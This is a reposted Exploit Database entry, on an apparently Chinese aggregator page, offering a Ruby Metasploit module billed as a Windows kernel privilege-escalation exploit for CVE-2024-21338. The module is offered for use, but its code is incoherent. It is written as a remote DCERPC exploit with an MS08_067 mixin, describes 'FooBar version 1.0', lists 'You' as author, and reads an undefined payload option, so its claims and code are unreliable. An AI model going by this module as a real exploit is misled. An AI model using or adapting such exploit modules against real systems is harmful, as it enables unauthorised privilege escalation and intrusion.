Microsoft Windows 10.0.17763.5458 – Kernel Privilege Escalation

• Exploit Database
• 47 阅读

• 作者： E1 Coders
  日期： 2024-04-02
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/51946/

• #############################################
  # Exploit Title :  Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation
  # Exploit Author: E1 Coders
  # CVE: CVE-2024-21338
  #############################################
  
   
  require 'msf/core'
   
  class MetasploitModule < Msf::Exploit::Remote
    Rank = NormalRanking
   
    include Msf::Exploit::Remote::DCERPC
    include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact
   
    def initialize(info = {})
      super(
        update_info(
          info,
          'Name' => 'CVE-2024-21338 Exploit',
          'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',
          'Author' => 'You',
          'License' => MSF_LICENSE,
          'References' => [
            ['CVE', '2024-21338']
          ]
        )
      )
   
      register_options(
        [
          OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),
          OptPort.new('RPORT', [true, 'The target port', 1234])
        ]
      )
    end
   
    def check
      connect
   
      begin
        impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')
      rescue Rex::Post::Meterpreter::RequestError
        return Exploit::CheckCode::Safe
      end
   
      Exploit::CheckCode::Appears
    end
   
    def exploit
      connect
   
      begin
        impacket_artifact(
          dcerpc_binding('ncacn_ip_tcp'),
          'FooBar',
          datastore['FooBarPayload']
        )
      rescue Rex::Post::Meterpreter::RequestError
        fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'
      end
   
      handler
      disconnect
    end
  end
   
   
  #refrence :  https://nvd.nist.gov/vuln/detail/CVE-2024-21338